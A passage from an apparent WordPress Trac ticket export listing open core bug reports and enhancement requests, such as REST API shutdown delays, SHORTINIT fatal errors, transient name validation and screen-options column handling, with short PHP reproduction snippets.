dev-feedback 2011-03-11T15:09:23Z 2017-07-10T16:18:37Z "When a user signs up for an account on a wordpress blog, if their chosen username is longer than the limit, wordpress chops of the end of the username, without warning the user, and without offering the user the opportunity to choose again. Steps to reproduce: Go to a wordpress blog, sign up with a long username, and read the confirmation email. An example: forum.xbmc.org, which has a limit of 15 characters." hughcharlesparker Future Releases 48115 Sidebar starter content issue with Twenty Twenty Customize 4.7 normal normal Awaiting Review enhancement new dev-feedback 2019-09-24T00:15:38Z 2021-06-01T00:50:40Z "Hello, While testing the beta I found the sidebar contents functioned a little odd. On initial install the sidebars showing on the front-end match what was in Appearance > Widgets which is; Footer #1 (Search, Recent Posts, Recent Comments) and in Footer #2 (Archives, Categories, Meta) But navigating the Appearance > Customizer > Widgets showed the defaults as Footer #1 (About this site) and Footer #2 (Find Us) and once I published the Customizer I found the front-end showed these two and then now the Appearance > Widgets also showing these. So it seems the default widget content from TwentyTwenty only loads into Customizer as a default and isn't the actual defaults found on install in Appearance > Widgets. Thanks" garrett-eclipse Future Releases 41358 Shutdown hooks can significantly slow down REST API responses REST API normal normal Awaiting Review defect (bug) new dev-feedback 2017-07-18T16:36:56Z 2019-01-30T16:09:27Z "If you have a site with some slow, maybe deferred actions hooked into `shutdown`, these actions will slow the response from the REST API unnecessarily. To test, simply add the following then do a request to the WP Rest API: {{{#!php <?php add_action( 'shutdown', 'delay_shutdown' ); function delay_shutdown() { sleep( 3); } }}} The response will not be sent out until all of these shutdown hooks are completed. In our case, we found that some heavy sync functions ran on shutdown would cause our API calls to WooCommerce API timed out, when really the response could have been sent much earlier so these calls could run afterwards. This is semi-related to https://core.trac.wordpress.org/ticket/27122 in that the fix could be along those lines. This isn't a solution we feel should be merged into WooCommerce itself because it would be more consistent to have it in WP itself, but see https://github.com/woocommerce/woocommerce/pull/16158/files So on shutdown, it ends any sessions, uses `fastcgi_finish_request` if available, and falls back to flushing. The response is sent and received, and shutdown continues on in the background. The response is sent before the `sleep(3`) in this test case. This could be applied to just REST API requests, or everywhere, depending on everyones feedback. If REST API only, it may make sense to fire an action after the response is sent to avoid `shutdown` hook altogether. " mikejolley Future Releases 42008 Show warning that usernames can't be changed Upgrade/Install normal minor Future Release defect (bug) reviewing close 2017-09-27T16:10:48Z 2020-11-01T11:47:08Z "When we install WordPress, it says ""Please provide the following information. Don't worry, you can always change these settings later."" But When we want to change username, WordPress does not allow. See screenshots." rinkuyadav999 Future Releases 58103 Show user roles when deleting users audrasjb Users normal normal Future Release enhancement reviewing changes-requested 2023-04-07T11:02:27Z 2024-02-12T20:50:24Z "When deleting an admin user, who has published something before, you will be asked to transfer the ownership of posts: {{{ Attribute all content to: }}} Then there's a list with ALL users of the site, having all sorts of roles and therefore it can be huge. My proposal is to somehow differenciate between user roles here so one can easily pick another admin." Presskopp Future Releases 36432 Show Site ID and Theme in My Sites Networks and Sites 4.4.2 normal normal Awaiting Review enhancement new dev-feedback 2016-04-06T21:27:31Z 2019-11-05T13:49:25Z It could be useful to show in My Sites menu, for each site, the Theme/Child Theme applied and the site ID jusox Future Releases 30169 show available languages in theme details Themes normal normal feature request new dev-feedback 2014-10-29T11:22:41Z 2019-06-04T21:12:44Z "Hi! WordPress reads it from the header of the theme style.css the data for the theme-details. There, but an additional line can be added. Languages​​: with the available languages ​​(en, fr, it, de, etc) This could in theme details are made visible and at the wordpress.org themes in the discription. This would facilitate users to find a theme that does not speak English. When looking on wordpress.org theme would be an additional criterion in the Theme selection." Kniebremser Future Releases 49151 Show a warning for plugins in WP admin that haven't received updates in a long time audrasjb* Site Health normal normal Future Release feature request accepted dev-feedback 2020-01-08T10:09:36Z 2024-02-23T13:13:08Z When upgrading plugins in WordPress admin users are very likely to miss plugins that aren't receiving regular updates from their authors. The same warning (or similar) that's displayed on WordPress.org plugin repo should be displayed in the same manner as available plugin updates on the WordPress admin plugin page. vincenthasselgard Future Releases 54400 "Show ""Add New"" title buttons on single-site Plugins/Themes pages for capable users in multisite" Administration 3.0 normal normal Awaiting Review enhancement new dev-feedback 2021-11-08T18:31:15Z 2021-11-08T20:05:50Z "On multisite installations, when viewing a single site's admin area – as a Network Admin (or otherwise capable user) – none of the ""Add New"" links for Plugins & Themes are displayed. I would like to re-add these buttons back, but have them link to the correct Network Admin pages. At first scan, not having these buttons on single sites makes sense because it is not possible to add a new plugin or theme at the site level. After having this be the default behaviour since WordPress 3.0, I think it could be improved. Conceptually, the problem isn't that installing plugins or themes is no longer possible in multisite, it is simply that the location and capabilities required to do so are elevated from single-site. If the currently logged in user can access those locations ''and'' has the capability to perform the task, it would be convenient to re-show these buttons but link them to the network URLs. To replicate: * Log into a multisite installation as a Network Admin * Visit `/wp-admin/plugins.php` * Notice there is no ""Add New"" link or button anywhere * The only UI path to add a plugin is: `Admin Bar > My Sites > Network Admin > Plugins > Add New` (Themes has the same above issue & relative navigation...)" johnjamesjacoby Future Releases 39439 Should wp_insert_attachment() update GUID Posts, Post Types 4.8 normal normal Awaiting Review enhancement new dev-feedback 2017-01-02T12:58:08Z 2021-08-06T11:58:02Z "I have a ""special"" case scenario related to media library attachments. For the context, I've built a plugin that connects to an external server and sync images stored into the remote server into local WordPress media library. The importer upload files, generate the thumbnails and create a new ""attachment"" post. Now, an import process is ran everyday, and basically we re-import the remote images into WordPress but in order to avoid duplicates, we're updating existing attachments if exist. Now, during this update process, we only remove the files stored into the `uploads` directory, import the new one with its thumbnails and update the attachment post. Before doing so, our first approach was to check if an attachment exists, if exists, delete the attachment + its files and then simply create a new attachment. This first approach works but we're having huge ID number into the DB after the import as it generates thousand of new records which we didn't want. So now, only the files are updated, if an attachment post exists, we update its metadata and everything works as expected. Now the issue/remark we have is that during the update of the attachment post, each time we import the new image file, we set the `guid` property to change and use the new imported file path. But when we check the database table, the `guid` is not updated at all and reflects the path to the image file imported the first time. Looking at source code, during an update, the `guid` is not modified in general as for RSS feeds we need that unique `guid`. Our question is, is it relevant in this scenario to keep old `guid` property that points to a file that no longer exists? and so should we allow the `guid` to be updated by default in core for the attachment? If RSS readers need that `guid`, why attachments use the file path and not an attachment page permalink ? Is there another location that uses this `guid` property in place of the meta data for the file path ? " jlambe Future Releases 44133 Should the Data Export indicate when we have no information on the user xkon Privacy 4.9.6 normal normal Future Release enhancement assigned dev-feedback 2018-05-17T20:45:33Z 2021-11-08T00:27:04Z "Hello, If a data export is done for a non-existent user should we indicate in the .html file provided that we have no information on the subject? Currently the file is provided and just the initial table provided. If there's nothing else should a message be there to indicate that we currently have nothing stored on them? Thanks" garrett-eclipse Future Releases 24572 Should be able to unlock a post outside of ajax handler Posts, Post Types normal normal enhancement new dev-feedback 2013-06-12T20:28:37Z 2019-06-04T20:44:25Z "Right now you can programmatically lock a post for editing using wp_set_post_lock, but you can't unlock it in a similar fashion. The only unlocking code is found in the ajax handler wp_ajax_wp_remove_post_lock. I've created a function wp_unset_post_lock in the style of wp_set_post_lock that unlocks a post with a given ID. I've also refactored wp_ajax_wp_remove_post_lock to use this function. The only resulting difference is that we use the current user's ID instead of the one supplied in the ajax call, but since we're unlocking the post instead of locking it, it doesn't really matter who's ID is in the meta. This change was requested by Joey Kudish of the VIP team." bbrooks Future Releases 55796 SHORTINIT requires rest-api.php via rest_cookie_collect_status() via wp_get_current_user() Application Passwords 2.0 normal normal Awaiting Review defect (bug) new dev-feedback 2022-05-23T21:36:15Z 2022-05-24T06:09:11Z "Hello friends! 👋 I believe it may be unintended behavior that in order to use the `SHORTINIT` constant with standard cookie authentication, either `wp-includes/rest-api.php` must be included or its related default filters need to be removed. ---- **wp_get_current_user() – jjj1.php** {{{ <?php /** * Only initialize a ""short"" WordPress * */ define( 'SHORTINIT', true ); /** * Load WordPress */ require __DIR__ . '/wp-load.php'; /** * Create the main ""wp"" WordPress global */ $GLOBALS['wp'] = new WP(); /** * Set up the query vars */ wp( array( 'jjj' => true ) ); }}} Produces: {{{ Fatal error: Uncaught Error: Call to undefined function wp_get_current_user() in wp-includes/class-wp.php:635 Stack trace: #0 wp-includes/class-wp.php(768): WP->init() #1 wp-includes/functions.php(1330): WP->main(Array) #2 jjj1.php(31): wp(Array) }}} IMO, the inside of `WP->init()` has needed a `function_exists()` call around `wp_get_current_user()` since WordPress 2.0.0, and I'm only just now getting around to suggesting such 😅 ---- **rest_cookie_collect_status() - jjj2.php** {{{ <?php /** * Only initialize a ""short"" WordPress */ define( 'SHORTINIT', true ); /** * Load WordPress */ require __DIR__ . '/wp-load.php'; // Require files used for cookie-based user authentication require ABSPATH . WPINC . '/pluggable.php'; require ABSPATH . WPINC . '/kses.php'; require ABSPATH . WPINC . '/user.php'; require ABSPATH . WPINC . '/capabilities.php'; require ABSPATH . WPINC . '/class-wp-role.php'; require ABSPATH . WPINC . '/class-wp-roles.php'; require ABSPATH . WPINC . '/class-wp-user.php'; require ABSPATH . WPINC . '/class-wp-session-tokens.php'; require ABSPATH . WPINC . '/class-wp-user-meta-session-tokens.php'; /** * 'WP_PLUGIN_URL' and others are used by: wp_cookie_constants() */ wp_plugin_directory_constants(); /** * 'ADMIN_COOKIE_PATH' and others are used by: wp_set_auth_cookie() */ if ( is_multisite() ) { ms_cookie_constants(); } /** * 'SECURE_AUTH_COOKIE' and others are used by: wp_parse_auth_cookie() */ wp_cookie_constants(); /** * Sets: 'FORCE_SSL_ADMIN' and 'FORCE_SSL_LOGIN' */ wp_ssl_constants(); /** * Create the main ""wp"" WordPress global */ $GLOBALS['wp'] = new WP(); /** * Set up the WordPress query */ wp( array( 'jjj' => true ) ); }}} Produces: {{{ Fatal error: Uncaught TypeError: call_user_func_array(): Argument #1 ($callback) must be a valid callback, function ""rest_cookie_collect_status"" not found or invalid function name in wp-includes/class-wp-hook.php:309 Stack trace: #0 wp-includes/class-wp-hook.php(331): WP_Hook->apply_filters('', Array #1 wp-includes/plugin.php(476): WP_Hook->do_action(Array) #2 wp-includes/pluggable.php(705): do_action('auth_cookie_mal...', false, '') #3 wp-includes/class-wp-hook.php(307): wp_validate_auth_cookie(false) #4 wp-includes/plugin.php(191): WP_Hook->apply_filters(false, Array) #5 wp-includes/user.php(3583): apply_filters('determine_curre...', false) #6 wp-includes/pluggable.php(70): _wp_get_current_user() #7 wp-includes/class-wp.php(635): wp_get_current_user() #8 wp-includes/class-wp.php(768): WP->init() #9 wp-includes/functions.php(1330): WP->main(Array) #10 jjj2.php(65): wp(Array) }}} This happens because `wp-includes/default-filters.php` assumes that the REST API will always be loaded, and the default `pluggable.php` versions of the cookie based authentication functions apply filters that the REST API also uses by default, including the Application Password feature. ---- If the REST API were a SHORTINIT auth requirement, my ''guess'' is that it would have been required earlier in `wp-settings.php`. This is all somewhat of a catch-22 situation, because `default-filters.php` ''is'' loaded for `SHORTINIT` which is far ahead of when both cookie auth and the REST API are both included. It is possible to work around this by removing the hooks, but obviously that only counts for today's hooks, and not future hooks if something new is introduced. I think a core code change will be required to decide when & how the REST API filters are applied. 😬" johnjamesjacoby Future Releases 43686 Shortcodes containing asterisks may create invalid regex breaking the editor Shortcodes normal normal Future Release defect (bug) new dev-feedback 2018-04-03T21:31:40Z 2019-01-16T02:41:00Z "Despite not being a reserved character an asterisk in a shortcode followed by another character will generate invalid regex which breaks the editor. This code reproduces the issue: {{{#!php <?php foreach (['*one', '*two'] as $bullet) { add_shortcode('*' . $bullet, function () use ($bullet) { return 'oh no ' . $bullet; }); } }}} Attached is a gif showing the editor tabs not working correctly along with the error in the console in Chrome 65 and Firefox 59. I know it's unconventional to use an asterisk in a shortcode, but my use case is porting a legacy CMS that used BBCode into WordPress while trying to keep as much of the original formatting possible for old content. This is an issue with all plugins deactivated (except for the above code) using the Twenty Seventeen theme." Vusys Future Releases 46087 Short-circuit `page_on_front` check during site creation Rewrite Rules normal normal Awaiting Review enhancement new dev-feedback 2019-01-23T22:58:45Z 2019-01-23T22:58:45Z "During site initialization, `wp_installing()` is set to `true`. Among other things, this toggle disables all caching from `get_option()`. While I think that this behavior could use a general review (it's legacy behavior from MU that may have been an overly-broad fix for a narrow `alloptions` problem), there's one specific offender I'd like to consider addressing: `page_on_front`. `generate_rewrite_rules()` calls `get_option( 'page_on_front' )` several times for each rewrite rule, and each of these calls requires a database read. Since `page_on_front` is set to 0 in the default schema, I propose that we short-circuit the check during site initialization (`wp_install_defaults()`). Something like: {{{ add_filter( 'pre_option_page_on_front', '__return_empty_string' ); $wp_rewrite->init(); $wp_rewrite->flush_rules(); remove_filter( 'pre_option_page_on_front', '__return_empty_string' ); }}} Not terribly elegant, but it can reduce DB I/O by many dozens of reads." boonebgorges Future Releases 30300 setUserSetting js function only removes first unwanted character Administration 2.7 normal normal defect (bug) new dev-feedback 2014-11-09T17:08:15Z 2019-06-04T19:26:58Z "The function comments of the function setUserSetting in `wp-includes/js/utils.js` says the following: ""Both name and value must be only ASCII letters, numbers or underscore (...)"". The function removes the unwanted characters with the js `replace` function, in the current code, it only removes the first occurrence of an unwanted character. This is solved by adding the `g` modifier to the replace regex. See the attached patch. How to reproduce: * Open your browsers console while you are logged in to your WordPress installation. * Run the following command: `setUserSetting('test--', 'bad-value-')` (note that the - character is not allowed) * The console will return `""test-""` (not `""test""` as expected). * Run `getUserSetting('test-')`. * The console returns `""badvalue-""` (not `""badvalue""` as expected). * You may want to delete the setting by executing `deleteUserSetting('test-')`. " TV productions Future Releases 55584 Settings API autoload hook Options, Meta APIs normal normal Awaiting Review enhancement new dev-feedback 2022-04-18T04:56:49Z 2023-08-31T17:43:17Z "Currently all settings registered via Settings API is forced to enable autoload, There is no hook to replace this. Lets imagine just for example: 1. all wordpress plugins is using this to register their settings data. but not delete this value during uninstall. 2. Average wodpress admin install then uninstall 50 plugins in their lifetime. 3. Average autoloaded setting is 100kb per plugin there will be 5mb autoloaded options which not used anymore. that event is per pageload. Just imagine that. " hir88en Future Releases 58380 Setting time limit for updates doesn't always work. pbiron* Upgrade/Install normal normal 6.6 enhancement accepted dev-feedback 2023-05-23T13:34:30Z 2024-02-12T09:05:39Z "Warning: set_time_limit(): Cannot set max execution time limit due to system policy in /customers/7/5/e/lucasgent.be/httpd.www/***/wp-admin/includes/class-wp-upgrader.php on line 475 I usually comment out these lines since on my host one.com I ALWAYS get this additional warning line after succesfull updates. Is there something that can be done, so I don't have to do this for each new WP site...? Maybe a sort of option where you can enable/disable this? " NekoJonez Future Releases 31839 Setting error reporting level for wp_debug_mode Bootstrap/Load 4.1.1 normal normal enhancement new dev-feedback 2015-04-01T16:25:34Z 2023-12-12T20:27:56Z "Since PHP 5.4.0 `E_STRICT` errors appear as part of `E_ALL` and headers cannot be sent sometimes - stuff that can lead to a whole set of problems. For me, they are useless and annoying - but for others they can be useful. I just want the possibility to set the `error_reporting` level used in `wp_debug_mode()`. I have applied a small patch to `load.php` as shown below. I have defined a `WP_DEBUG_LEVEL` constant in `wp-config.php` like so: `define( 'WP_DEBUG_LEVEL', E_ALL & ~E_STRICT );` because I do not want to see the `E_STRICT` warnings. Afterwards I modified the `wp_debug_mode` function like so: {{{ #!php function wp_debug_mode() { if ( WP_DEBUG ) { if( !defined( WP_DEBUG_LEVEL ) ) define( 'WP_DEBUG_LEVEL' , E_ALL) ; error_reporting( WP_DEBUG_LEVEL ); if ( WP_DEBUG_DISPLAY ) ini_set( 'display_errors', 1 ); elseif ( null !== WP_DEBUG_DISPLAY ) ini_set( 'display_errors', 0 ); if ( WP_DEBUG_LOG ) { ini_set( 'log_errors', 1 ); ini_set( 'error_log', WP_CONTENT_DIR . '/debug.log' ); } } else { error_reporting( E_CORE_ERROR | E_CORE_WARNING | E_COMPILE_ERROR | E_ERROR | E_WARNING | E_PARSE | E_USER_ERROR | E_USER_WARNING | E_RECOVERABLE_ERROR ); } if ( defined( 'XMLRPC_REQUEST' ) ) ini_set( 'display_errors', 0 ); } }}} Here's the [https://gist.github.com/AlexandruIfrim/8e3626f27344f8f28a87 gist] of it." aifrim Future Releases 58903 set_transient() allows invalid transient name Options, Meta APIs normal normal Future Release defect (bug) new changes-requested 2023-07-25T19:33:17Z 2024-02-08T20:13:48Z "Due to a typo/bug in my plugin code, I found that WordPress accepts empty strings, null, and false for the `$transient` arg, aka: the transient name, in `set_transient()` function which creates transients in the options database with values of simply `_transient_` and `_transient_timeout_`. That said... the transient created with an empty string continued to work (could be set and get and deleted). Because the typo in my code referenced a variable that held the transient name but was empty, the get, set, and delete function calls worked (annoyingly). I did observer two issues... 1. In the event two developers cause the same mistake/error, their transients will collide with each other. 2. More importantly, I observed the empty string transient will not be cleaned up by the delete_expired_transients routine. (The Transients Manager plugin must use delete_expired_transients() as it could not delete the transient either.) I will submit a second ticket for this issue. Upon review of the set_transient() and add_option() code, I observed several opportunities to improve, including: - return false for empty $transient value - return false for bool, non-scalar $transient values - cast $transient as string - return false for strings with more than 172 characters These false returns will guide developers to fix issues with malformed $transient names. I have a pull request to github ready to follow this ticket." jeremyescott Future Releases 29795 Set JPEG quality for individual image_size Media normal normal Awaiting Review enhancement new dev-feedback 2014-09-29T14:20:54Z 2017-11-10T12:24:43Z "Based on this idea I would like to work on this topic: https://wordpress.org/ideas/topic/jpeg-compression-factor-for-different-image_size Usecase: If a theme use an image as a full screen background image the image quality doesn't need to be as high as for a featured image or thumbnail. The difference in file-size would benefit the webspace and the speed on page load. I can think of two ways to solve it: 1. Add a argument to add_image_size: {{{ add_image_size( $name, $width, $height, $crop, $quality ); }}} 2. Add filter for it: {{{ apply_filters( 'jpeg_quality_for_image_size', $quality, $size ); }}} In both cases the information about the current image size needs to be added to the set_quality or get_quality functions to be available." Drivingralle Future Releases 14125 Seperate out non-editable options in edit site sorich87* Options, Meta APIs normal normal enhancement accepted dev-feedback 2010-06-28T04:11:36Z 2019-06-04T20:41:23Z "In the edit site screen, blog options which are arrays are shown as SERIALIZED and the textbox is disabled. The attached patch pulls those options out of the options metabox and displays the option name in another metabox below. Related: #14120" wpmuguru Future Releases 43208 Separate setting validation from sanitization Options, Meta APIs normal normal Awaiting Review enhancement new needs-unit-tests 2018-02-01T23:45:12Z 2020-11-06T23:12:25Z "As widely known, validation is different from sanitization. A value should first be validated and then be sanitized. Historically, WordPress has been mixing these two responsibilities in the `sanitize_option()` function, however it is easily possible to add an extra layer on top of that which maintains full backward-compatibility. Newer parts of core, such as the Customizer and the REST API, have been dealing with this in a better way, keeping the two separate. We can achieve the same for options themselves too. I suggest introducing a `validate_option_{$option}` filter that works somewhat similar like the `customize_validate_{$setting_id}` filter used in the Customizer. It passes an empty `WP_Error` object that can be added to. In addition to allow separate validation from sanitization, it also makes handling of validation easier, since it can then automatically set the value to the previous value and call `add_settings_error()`, passing any error messages set, which matches current core behavior." flixos90 Future Releases 13372 Separate Image sizes for different post types Media 4.6.1 normal normal Awaiting Review enhancement reopened close 2010-05-13T07:59:07Z 2020-04-18T04:45:23Z Would be nice, especially moving forward with custom post types to have the ability to set different image sizes using an additional parameter of `add_image_size()` for different post types: Page, Post, and Custom. brandondove Future Releases 14558 Separate Database Table Support for Custom Post Types Posts, Post Types normal normal Awaiting Review enhancement reopened dev-feedback 2010-08-07T06:55:07Z 2024-03-04T09:51:27Z "While working on custom post types, I felt need for this enhancements. This can be achieved by adding an extra argument to the register_post_type function like below... {{{ register_post_type( 'acme_product', array( 'labels' => array( 'name' => __( 'Products' ), 'singular_name' => __( 'Product' ) ), 'public' => true, /* Database separation */ 'db_tables' => array( 'prefix' => '', //by default, value of $table_prefix will be used. If user sets this value to something, it will be used as prefix for both of following tables 'base_prefix' => '' , //this will control it tables are to be kept sitewide or per blog 'posts_name' => 'acme', 'postmeta_name' => 'acmemeta', ), ); }}} This small enhancement (not from coding perspective) will help more plugins authors go for custom post type. Reasons are - first they will get option to have separate data storage. Second - if some other badly coded plugin manipulates wp_posts table in some wrong way, it won't have sideeffect on third-party data. Third - Plugin authors will get more space to experiment as at any time they will be dealing with their own plugin's data. Of course, one of the goal of this nice feature must be to abstract database layer, but as a developer I feel it would be better if I can have some control over database without loosing power of this new (custom post type) feature." rahul286 Future Releases 47788 send_headers hook does not work in wp-login or wp-admin Administration 5.2.2 normal normal Awaiting Review defect (bug) new dev-feedback 2019-07-28T10:18:17Z 2019-10-20T11:56:12Z "Assume that I want to start using CSP (Content Security Policy) on my website. I add this to my theme's functions.php: {{{#!php <?php add_action('send_headers', 'set_CSP_header'); function set_CSP_header() { $CSP = ""Content-Security-Policy: default-src 'self';""; header($CSP); } }}} You would assume that this would add the CSP everywhere on the website, but that is not so. This does NOT add the CSP header to wp-login or wp-admin. Instead website admins have to use the 'login_init' and 'admin_init' hooks in addition to 'send_headers', to get CSP everywhere on the website. This is unintuitive and seems like a bug to me." kysymysteke Future Releases 38028 Send emails via an action Mail normal normal Awaiting Review enhancement new dev-feedback 2016-09-12T20:55:20Z 2020-01-16T14:30:48Z "There are a number of ways that you may want to interact with core emails in WordPress. To name two * Use a different server to send (e.g. to benefit from DKIM/SPF) * Use custom templates, HTML, multipart etc. Currently solutions to achieve these things are not ideal. Pluggable functions leave exposure to other core changes and leave no scope for a 'fallback' to default if it is necessary. Filters for content are inconsistently (if at all) applied leaving some messages totally inaccessible to developers, save through the wp_mail filter - which is hacky at best (try catching a translated message). My proposal is relatively simple - send all emails in core through an action hook. `do_action( 'wp_mail_{email_id}', $args );` `$args` of course would carry the necessary elements for the dynamic parts of a message. An call add_action can then exactly replace what is being done at present to generate the message and make the `wp_mail` call. Any developer that wants to interact with the message can then simply remove the core action and add their own - to alter the message and/or send using an alternative mechanism to `wp_mail`, falling back to it if necessary. Possibilities for developers are then endless. `wp_mail` stays in tact and as the hook call replaces current functionality there is no issue with backward compatibility - all existing filters can stay in place." markcallen Future Releases 46971 Selected Image gets overflow in Edit Image in Media upload - iPhone - 6/7/8 Media normal normal Awaiting Review defect (bug) new dev-feedback 2019-04-18T09:01:10Z 2019-04-30T17:27:52Z "Hello, While we edit image from admin dashboard (Dashboard > Media > Library - edit), the selected image gets overflow in iPhone-6/7/8 portrait mode. So for that, we can apply max-width: 100%. Thanks, Shashank." shashank3105 Future Releases 49963 Security of failed update/rollback Upgrade/Install 5.5 normal major Awaiting Review enhancement new dev-feedback 2020-04-20T20:31:29Z 2020-04-20T20:44:53Z "As discussed on the [[https://make.wordpress.org/core/2020/04/16/devchat-meeting-summary-april-15-2020/|previous devchat]] in case of failed update/rollback there are email notifications. Idea is good: any errors related to Core, Plugin or Theme update should be reported to an email of admin as soon as possible. But in the real world there are too few properly configured mail servers in wordpress and servers at all. Actually there is no good documentation how to set up email: https://wordpress.org/search/mail In addition there are a lot of ''lazy'' administrators with email addresses like admin@example.com or something similar. Thus so many **really important mails** about failed update/rollback will be send to `/dev/null`. It is security issue because website will be inconsistent state indefinite amount of time (for example login plugin not updated and not rollbacked). 1. Do you know how many wordpress installs have properly configured mails? 2. How to motivate admins to use real email addresses? 3. Maybe there is sense to prepare good documentation about mailing in wordpress? 4. Should auto-updates plugin works at all wothout properly configured emergency notifications? * Original Github Issue: https://github.com/WordPress/wp-autoupdates/issues/83 * Feature Plugin: WP Auto-updates https://make.wordpress.org/core/2020/02/26/feature-plugin-wp-auto-updates/" mahnunchik Future Releases 57280 Security automatic updates for plugins and themes Upgrade/Install normal normal Awaiting Review enhancement new dev-feedback 2022-12-06T02:50:08Z 2022-12-06T17:04:31Z "The option to enable automatic security updates for plugins and themes would allow users to secure their websites without worrying too much about significant/major breaking features. This enhancement would allow more granular control of auto-updates without forcing users to update to major releases. I propose new toggles in the WordPress Updates page under the Plugins and Themes section at wp-admin/update-core.php: This site's plugins are automatically kept up to date with each new version **Switch to automatic updates for maintenance and security releases only. ** This site's plugins are automatically kept up to date with maintenance and security releases. **Enable automatic updates for all new versions. ** The same logic would be applied to themes. Defining what kind of updates apply to security would be challenging, so I propose starting with popular or problematic plugins." JosVelasco Future Releases 50181 Second params of get_option() not used Options, Meta APIs 5.4.1 normal normal Awaiting Review defect (bug) new dev-feedback 2020-05-15T15:50:44Z 2020-05-18T10:08:43Z "Hello In a develp=opment I have something like {{{ $options = get_option( 'my_option', array() ); foreach ( $options as $option ) { // doing things } }}} The option stored seems to be not unserializable. So when going through https://github.com/WordPress/WordPress/blob/master/wp-includes/option.php#L152 + unserialize() which return false on error the second parameter is not used and we got a Warning. We're not testing `$options` thinking with the second param setted to `array()` will allways return an array... " sebastienserre Future Releases 18513 Searching with explicit post types unsets page post type Query 3.2.1 normal normal defect (bug) new needs-unit-tests 2011-08-24T22:13:08Z 2022-02-12T20:43:32Z "Tested on WP 3.2.1, Twenty Eleven with no plugins, multisite. If I explicitly limit a search query via a GET request using an array of post_type values, the post_type for page is automatically excluded. To reproduce: * Do a search on a WP install (perhaps through a modified search form), such that the URL is like: http://example.com/?post_type[]=post&post_type[]=page&post_type[]=attachment&s=Test or http://example.com/?post_type[]=post&post_type[]=page&post_type[]=book&s=Test That's searching for ""Test"" on post, page and attachment/book post types. * Adding the following to a theme's functions.php: {{{ add_filter( 'pre_get_posts', 'wpcpt_search' ); /** * * @param array $query */ function wpcpt_search( $query ) { if ( ! $query->is_search ) return $query; print_r( $query->query_vars ); return $query; } }}} That spits out (and seemingly confirmed via the values shown in the Debug Bar plugin) the following at the beginning: {{{ Array ( [s] => Test [post_type] => Array ( [0] => post [2] => attachment ) }}} and only returns results for posts and attachments (or books). The fact that key 1 is missing makes me think that page was in the array at some point, but it's been unset, but I can't see where, or why, this might be done. (When no post_type is set, giving a post_type of 'any', which in turn gives all of the non-excluded_from_search post types, then page is one of the array values, and the search results correctly include pages.) " GaryJ Future Releases 12477 Search with special characters and similar terms nbachiyski I18N normal normal feature request new dev-feedback 2010-03-02T17:42:46Z 2019-06-04T20:01:58Z "I did:Tried searching for terms Metis and Métis I saw:Those two searches turned up different sets of results. I expected:The same set of search results, or at least everything when I searched for Metis. Can search be smarter when special characters are involved?" mrroundhill Future Releases 39443 Search Page Template the_category() bug Posts, Post Types 4.7 normal normal Awaiting Review defect (bug) new dev-feedback 2017-01-03T07:38:03Z 2020-01-04T03:30:46Z "Suppose If I've selected three categories following a structure HR -> Reports -> Daily Reports. Single.php shows the structure in the right way but when I use the same the_category () function inside Search template then it shows the different result. Rather than showing it in the default structure, it shows it like Daily Reports -> HR -> Reports. In search template the structure changes to order by name. The_category working perfectly in other pages." cybentizen Future Releases 41564 Search for hyphenated post templates for post types with underscores Posts, Post Types normal normal Awaiting Review feature request new dev-feedback 2017-08-04T17:16:29Z 2017-08-13T15:54:10Z "Custom post type names adhere to the rules within sanitize_key() (lowercase alphanumeric characters, dashes, and underscores). This means registering a post type `some_post_type` is perfectly fine. The archive and single templates would be be `archive-some_post_type.php` and `single-some_post_type.php`. These file names do not adhere to the core standard for file names. Files should be named descriptively using lowercase letters. Hyphens should separate words. Searching for `archive-some-post-type.php` in addition to `archive_some_post_type.php` would allow this standard to be followed better." desrosj Future Releases 29030 Screen Options Poor Update/Rendering Causes Many things to Break Administration 3.9.1 normal normal Awaiting Review defect (bug) new dev-feedback 2014-07-26T01:21:46Z 2018-08-08T19:15:02Z "Screen options dont work properly in many different situations. I noticed the first issue when trying to create a sticky header plugin for the wp_list_table. When scrolling down the page the headers stick to the top by cloning the header with javascript and hiding the other original at the same time. However, If screen options are updated the tables break completly even after the plugin is disabled. Wordpress checks the current table headers to determine which ones are hidden and should be added to the `manageedit-{$post_type}columnshidden` field in the `user_meta` table. So since the cloned table header the plugin created is hidden visually while scrolling up, wordpress thinks that all columns aredisabled and adds all the columns to `manageedit-{$post_type}columnshidden`. [[Image(http://i.stack.imgur.com/wrYin.png)]] This is poor practice because it doesn't seperate presentation well enough from the logic used to render screen options. Any user who has access to `wp-admin/edit.php`can completly break their tables if any html/css visually hides the `<thead>` or a column-header perhaps by a plugin, or maybe the browser doesn't load a certain script, or perhaps they are just messing with the dev-tools. Beginers that don't know how to properly [remove columns][5], could run into this issue if they ever try to use css instead. `manageedit-{$post_type}column` should not rely on the visibility of <thead> and only the actual checked input fields. Also `cb` and `title` should not be allowed to be added to the `manageedit-{$post_type}column`. They should only be able to be removed with `unset`. ---------- **To recreate this issue:** 1. open up firebug/chrome dev tools/etc. on http://www.example.com/wp-admin/edit.php 2. add `thead {display: none;}` to the style editor 3. On the page screen options uncheck at least one column ( this is to ensure `manageedit-{$post_type}columnshidden` is a database field for the current user and if not it creates it ) 4. Hit apply to refresh the page *The tables will now be broken....* ---------- To chck the columns I used the `get_user_meta();` function to print the array of `hiddencolumns` on each post types `edit.php` admin screen notices: {{{ <?php function get_current_post_type() { global $post, $typenow, $current_screen; if ($post && $post->post_type) return $post->post_type; elseif ($typenow) return $typenow; elseif ($current_screen && $current_screen->post_type) return $current_screen->post_type; elseif (isset($_REQUEST['post_type'])) return sanitize_key($_REQUEST['post_type']); return null; } function get_current_user_manageedit_pagecolumnshidden() { $current_ptype = get_current_post_type(); $user_id = get_current_user_id(); $key = 'manageedit-'.$current_ptype.'columnshidden'; $single = true; if(get_user_meta($user_id, $key, $single)) return get_user_meta($user_id, $key, $single); } function echo_current_user_manageedit_pagecolumnshidden() { global $pagenow; if ( $pagenow !== 'edit.php' ) return; $columnshidden= get_current_user_manageedit_pagecolumnshidden(); echo '<pre>'; print_r( $columnshidden ); echo '</pre>'; } add_action('all_admin_notices', 'echo_current_user_manageedit_pagecolumnshidden'); }}} **Output for the broken tables :** {{{ Array ( [0] => cb [1] => title [2] => [3] => ) }}} ---------- After determining that `cb` & `title` were in fact added to the `$meta_value`you need to fix the table. This will do the trick: {{{ function delete_current_user_manageedit_pagecolumnshidden() { $user_id = get_current_user_id(); $meta_key = 'manageedit-pagecolumnshidden'; if( get_user_meta($user_id, $meta_key) ) delete_user_meta( $user_id, $meta_key ); } add_action ('admin_init', 'delete_current_user_manageedit_pagecolumnshidden'); }}} 